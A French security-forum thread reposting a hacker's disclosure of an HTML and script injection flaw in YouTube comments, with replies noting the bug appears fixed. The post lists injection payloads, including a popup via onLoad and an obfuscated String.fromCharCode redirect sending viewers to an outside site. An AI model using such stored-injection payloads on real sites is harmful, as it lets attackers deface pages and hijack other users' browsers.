ASafety - AntiSecurity Un projet qui vous tiendra @coeur...

[x[@♥]]

Youtube HTML Code Injection

Une vulnérabilité indigne de YouTube à été découverte par TinKode sur les commentaires. Simple d'exploitation, il a illustré son utilisation par de simple code JS injecté :

Hello, in this article I’ll show you a little vulnerability in YOUTUBE.com more exactly it’s about HTML Code Injection.

What you can do with this? Hmm, you can use all HTML BB Codes in comments. And bonus a BIG popup.

How you can activate HTML in comments? It’s very simple. With:

Code: Tout sélectionner

    <script>HTML Code

Example:

Code: Tout sélectionner

    <script><h1> Visit Insecurity.Ro – ISR Security Team <blink><marquee><br><br>TinKode

And for popup:

Code: Tout sélectionner

    <script><BODY onLoad=”alert(‘Visit Insecurity.ro – TinKode’);”

If you want to make redirect:

Code: Tout sélectionner

    <script>Zbody onLoad=”document.write(‘<script>window.location = String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 119, 119, 119, 46, 105, 110, 115, 101, 99, 117, 114, 105, 116, 121, 46, 114, 111, 47);</script>’);”;

If you add this comment the page will be auto redirected to www.insecurity.ro

Src here:

Code: Tout sélectionner

http://blog.insecurity.ro/

[Jill]

A priori bug fixed on peut plus publier ce genre de commentaires...

[x[@♥]]

A priori bug fixed on peut plus publier ce genre de commentaires...

Ça ne m'étonne pas qu'il n'est pas trainé! Par contre je suis étonné qu'elle n'est pas été détectée plus tôt. Surtout que les syntaxes sont loin d'être exotiques!